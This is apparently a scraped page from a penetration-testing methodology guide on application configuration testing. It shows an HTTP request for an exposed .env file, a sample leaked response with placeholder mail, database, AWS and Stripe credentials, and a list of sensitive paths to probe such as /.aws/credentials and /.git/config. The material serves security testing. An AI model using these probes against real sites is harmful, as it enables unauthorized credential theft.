App Platform Configuration
Check List
Methodology
Black Box
TOR Technique for Finding Sensitive Routes
1
2
3
4
5
6
7
8
Information Disclosure via Exposed .env File
.env File1
GET /.env HTTP/1.1
Host: company.com2
MAIL_HOST=mail.company.com
MAIL_USERNAME=admin@company.com
MAIL_PASSWORD=AdminPass2024!
DATABASE_URL=postgresql://user:pass@host/db
AWS_ACCESS_KEY_ID=AKIA...
STRIPE_SECRET_KEY=sk_live_...3
4
5
6
/.env
/.env.backup
/.git/config
/config.php
/.aws/credentials
/phpinfo.php7
Cheat Sheet
Sample And Known Files And Directories
Comment Review
System Configuration
Configuration Review
Logging
Last updated